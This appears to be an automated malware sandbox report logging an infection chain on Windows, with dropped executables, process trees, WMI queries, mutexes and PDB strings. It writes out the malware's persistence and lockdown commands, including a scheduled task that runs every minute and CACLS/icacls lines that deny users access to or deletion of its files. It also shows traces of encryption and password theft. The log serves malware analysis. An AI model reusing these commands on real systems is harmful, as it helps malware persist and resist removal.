Source: C:\Users\user\AppData\Local\Temp\A079.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process created: C:\Users\user\AppData\Local\Temp\958B.exe "C:\Users\user\AppData\Local\Temp\958B.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6364 -s 272
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C5F5.exe C:\Users\user\AppData\Local\Temp\C5F5.exe
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe	Process created: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe "C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe"
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process created: C:\Users\user\AppData\Local\Temp\958B.exe "C:\Users\user\AppData\Local\Temp\958B.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "yiueea.exe" /P "user:N"&&CACLS "yiueea.exe" /P "user:R" /E&&echo Y\|CACLS "..\577f58beff" /P "user:N"&&CACLS "..\577f58beff" /P "user:R" /E&&Exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "yiueea.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "yiueea.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\577f58beff" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\577f58beff" /P "user:R" /E
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe
Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	Process created: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe --Task
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe" --AutoStart
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F3CC.exe C:\Users\user\AppData\Local\Temp\F3CC.exe
Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	Process created: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe" --AutoStart
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2899.exe C:\Users\user\AppData\Local\Temp\2899.exe
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process created: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe "C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe" --AutoStart
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Process created: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe "C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5DA4.exe C:\Users\user\AppData\Local\Temp\5DA4.exe
Source: C:\Users\user\AppData\Local\Temp\5DA4.exe	Process created: C:\Windows\System32\cmd.exe cmd /c tlatest.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\958B.exe C:\Users\user\AppData\Local\Temp\958B.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\A079.exe C:\Users\user\AppData\Local\Temp\A079.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\A9E0.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\C5F5.exe C:\Users\user\AppData\Local\Temp\C5F5.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe" --AutoStart	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\F3CC.exe C:\Users\user\AppData\Local\Temp\F3CC.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\2899.exe C:\Users\user\AppData\Local\Temp\2899.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe" --AutoStart	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\5DA4.exe C:\Users\user\AppData\Local\Temp\5DA4.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process created: C:\Users\user\AppData\Local\Temp\958B.exe C:\Users\user\AppData\Local\Temp\958B.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd" /deny *S-1-1-0:(OI)(CI)(DE,DC)	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A079.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\A9E0.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	Process created: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe --Task	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process created: C:\Users\user\AppData\Local\Temp\958B.exe "C:\Users\user\AppData\Local\Temp\958B.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\Temp\C5F5.exe	Process created: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe "C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe"
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe" /F
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "yiueea.exe" /P "user:N"&&CACLS "yiueea.exe" /P "user:R" /E&&echo Y\|CACLS "..\577f58beff" /P "user:N"&&CACLS "..\577f58beff" /P "user:R" /E&&Exit
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process created: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe "C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe"
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "yiueea.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "yiueea.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\577f58beff" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\577f58beff" /P "user:R" /E
Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	Process created: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe "C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe" --AutoStart
Source: C:\Users\user\AppData\Local\Temp\2899.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe	Process created: C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe "C:\Users\user\AppData\Local\4c7c13e1-925f-4ff0-826d-ce9637761605\build2.exe"
Source: C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\5DA4.exe	Process created: C:\Windows\System32\cmd.exe cmd /c tlatest.bat
Source: C:\Users\user\AppData\Local\Temp\5DA4.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\2899.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\958B.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\958B.exe

Code function: 8_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,

8_2_0040D240

Source: build2.exe, 0000002C.00000002.2975374229.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.2972643559.000000000DDBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: build2.exe, 0000002C.00000002.2975374229.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.2972643559.000000000DDBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: build2.exe, 0000002C.00000002.2975374229.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.2972643559.000000000DDBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: build2.exe, 0000002C.00000002.2975374229.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.2972643559.000000000DDBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: build2.exe, 0000002C.00000002.2975374229.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.2972643559.000000000DDBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: build2.exe, 0000002C.00000002.2975374229.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.2972643559.000000000DDBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: build2.exe, 0000002C.00000002.2975374229.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.2972643559.000000000DDBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: build2.exe, 0000002C.00000003.2932293861.000000000E76A000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.2966408279.00000000024E4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: build2.exe, 0000002C.00000002.2975374229.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.2972643559.000000000DDBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: build2.exe, 0000002C.00000002.2975374229.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 0000002C.00000002.2972643559.000000000DDBC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_008F14B5 CreateToolhelp32Snapshot,Module32First,

0_2_008F14B5

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6364
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2292:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Mutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
Source: C:\Users\user\AppData\Local\Temp\577f58beff\yiueea.exe	Mutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3660:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2604:120:WilError_03

Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: --Admin	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: IsAutoStart	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: IsTask	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: --ForNetRes	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: IsAutoStart	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: IsTask	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: --Task	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: --AutoStart	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: --Service	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: X1P	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: --Admin	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: runas	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: x2Q	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: x*P	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: C:\Windows\	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: D:\Windows\	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: 7P	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: %username%	8_2_00419F90
Source: C:\Users\user\AppData\Local\Temp\958B.exe	Command line argument: F:\	8_2_00419F90

Source: 958B.exe	String found in binary or memory: set-addPolicy
Source: 958B.exe	String found in binary or memory: id-cmc-addExtensions
Source: 958B.exe	String found in binary or memory: set-addPolicy
Source: 958B.exe	String found in binary or memory: id-cmc-addExtensions

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wextract.pdb source: 5DA4.exe, 0000002D.00000002.4500215462.00007FF757EB9000.00000002.00000001.01000000.00000015.sdmp, 5DA4.exe, 0000002D.00000000.2776286583.00007FF757EB9000.00000002.00000001.01000000.00000015.sdmp
Source:	Binary string: C:\m33GTEHGLLA6RxB7CWRFamBm9te4a9Dn\Provide.pdb source: A079.exe, 00000009.00000002.2650026410.0000000000658000.00000002.00000001.01000000.00000008.sdmp
Source:	Binary string: Age does not matchThe module age and .pdb age do not match. source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: symsrv.pdb source: 2899.exe, 00000028.00000002.4506634971.0000000005A09000.00000040.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000003.2776648258.00000000062F8000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000C79000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\hohilibojese75\lejuxoxo pizuda\novezegu 6-xenosaka.pdb source: 2899.exe, 00000028.00000001.2744600997.0000000000401000.00000020.00000001.01000000.00000012.sdmp, 2899.exe.2.dr
Source:	Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 958B.exe, 958B.exe, 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 958B.exe, 0000000E.00000002.2663864703.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, 958B.exe, 00000014.00000002.2645253997.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, 958B.exe, 00000018.00000002.4499830206.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 958B.exe, 00000024.00000002.4499782205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 958B.exe, 00000025.00000002.2730009741.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, 958B.exe, 00000027.00000002.2749135965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 958B.exe, 0000002B.00000002.2820154194.0000000002320000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: 2899.exe, 00000028.00000003.2776648258.0000000005EC1000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000843000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.00000000055D3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: 2899.exe, 00000028.00000003.2776648258.0000000005EC1000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000843000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.00000000055D3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: [YGC:\jireco.pdb source: file.exe
Source:	Binary string: symsrv.pdbGCTL source: 2899.exe, 00000028.00000002.4506634971.0000000005A09000.00000040.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000003.2776648258.00000000062F8000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000C79000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3[1].exe.24.dr
Source:	Binary string: C:\jireco.pdb source: file.exe
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: 2899.exe, 00000028.00000003.2776648258.0000000005EC1000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000843000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.00000000055D3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: 2899.exe, 00000028.00000003.2776648258.0000000005EC1000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000843000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.00000000055D3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: EfiGuardDxe.pdb source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 958B.exe, 00000007.00000002.2558333737.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, 958B.exe, 00000008.00000002.2608679572.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 958B.exe, 0000000E.00000002.2663864703.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, 958B.exe, 00000014.00000002.2645253997.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, 958B.exe, 00000018.00000002.4499830206.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 958B.exe, 00000024.00000002.4499782205.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 958B.exe, 00000025.00000002.2730009741.00000000023A0000.00000040.00001000.00020000.00000000.sdmp, 958B.exe, 00000027.00000002.2749135965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 958B.exe, 0000002B.00000002.2820154194.0000000002320000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: Signature does not matchThe module signature does not match with .pdb signature source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdb source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dbghelp.pdbGCTL source: 2899.exe, 00000028.00000003.2776648258.000000000614B000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4506634971.000000000585B000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3[1].exe.24.dr
Source:	Binary string: Loader.pdb source: 2899.exe, 00000028.00000003.2776648258.0000000005EC1000.00000004.00001000.00020000.00000000.sdmp, 2899.exe, 00000028.00000002.4499808504.0000000000843000.00000040.00000001.01000000.00000012.sdmp, 2899.exe, 00000028.00000002.4506634971.00000000055D3000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: #C:\hohilibojese75\lejuxoxo pizuda\novezegu 6-xenosaka.pdb source: 2899.exe, 00000028.00000001.2744600997.0000000000401000.00000020.00000001.01000000.00000012.sdmp, 2899.exe.2.dr
Source:	Binary string: wextract.pdbGCTL source: 5DA4.exe, 0000002D.00000002.4500215462.00007FF757EB9000.00000002.00000001.01000000.00000015.sdmp, 5DA4.exe, 0000002D.00000000.2776286583.00007FF757EB9000.00000002.00000001.01000000.00000015.sdmp
